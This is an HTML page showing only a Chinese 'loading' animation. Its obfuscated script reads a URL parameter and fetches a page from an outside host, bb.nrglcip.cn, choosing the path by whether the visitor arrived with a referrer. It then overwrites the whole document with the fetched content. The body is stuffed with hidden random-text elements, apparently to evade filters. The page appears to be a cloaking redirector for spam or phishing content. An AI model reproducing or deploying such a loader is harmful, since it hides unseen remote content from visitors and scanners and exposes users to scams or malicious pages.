<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ks1VNA6YkVq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ks1VNA6YkVq .TN5f81 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ks1VNA6YkVq .content {
            line-height: 50px;
            text-align: center
        }

        .ks1VNA6YkVq .img {
            width: 100%
        }

        .ks1VNA6YkVq .Y4L7Skz {
            text-align: center
        }

        .ks1VNA6YkVq .Y4L7Skz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ks1VNA6YkVq .Y4L7Skz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ks1VNA6YkVq .Y4L7Skz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ks1VNA6YkVq .Y4L7Skz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ks1VNA6YkVq .Y4L7Skz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ks1VNA6YkVq .Y4L7Skz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ks1VNA6YkVq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function i0ct2SqWdtDx(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oFDaA = i0ct2SqWdtDx('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oFDaA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oFDaA +".html?a=share";
		}
		
        JaKtNC8juS=url+"#"+new Date().getTime();
        JaKtNC8juS && function() {
            $.get(JaKtNC8juS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>zK5P2KWg7sWWgzHtwYFlH3VfwDk2GEIDwtfDb6c6KOMUuVqdicgrWqU3LmH03N1K4Z8aiCKhdaMAwK9qfq</div>
<p  style='display:none'>XIvOhNP6y3sY9to1eMUEr3lFBecTnPe9fSZxtFcSBEu8NmERpRAmRiTTtF9bl1M17cM7CAQEtzaRk</p>
<div style='display:none'>zK5P2KWg7sWWgzHtwYFlH3VfwDk2GEIDwtfDb6c6KOMUuVqdicgrWqU3LmH03N1K4Z8aiCKhdaMAwK9qfq</div>
<div style='display:none'>zK5P2KWg7sWWgzHtwYFlH3VfwDk2GEIDwtfDb6c6KOMUuVqdicgrWqU3LmH03N1K4Z8aiCKhdaMAwK9qfq</div>
<a  href='#' style='display:none'>m4oXaesjlOoo3qjucBddGnrucm</a><div class="ks1VNA6YkVq">
    <div class="TN5f81">
        <div class="Y4L7Skz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >dX2XFpYje1LcbcUYEfA3Tk3tCHqG5cKN3eFlZzyr33k8Dzw</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>opbhtchbKFl7To7M7p1Rp</p>
<h1 style='display:none' >zWnI3OrsNzRP24m0OLr9DLgRg548IcMujfsRPAnPbl1cPOJfm5pfEIa21wemXOgDAv</h1>
<ul style='display:none' >dX2XFpYje1LcbcUYEfA3Tk3tCHqG5cKN3eFlZzyr33k8Dzw</ul>
<p  style='display:none'>opbhtchbKFl7To7M7p1Rp</p>
<img  src='' style='display:none'>
<b style='display:none' >oVKCNqlw0V56GYhUvHFbRnf8HMWJADAOAgvsnd</b>
<span style='display:none'>V5zd4aTihuVjcb5n8nzsuD6obPXUl69j2JTrEFqUDpgfN3uwtAKmtWQl3J6ENoa1MTgvGbaZnfevwxDRB6cU1JI2X4AJrYpfbU</span></body>
</html>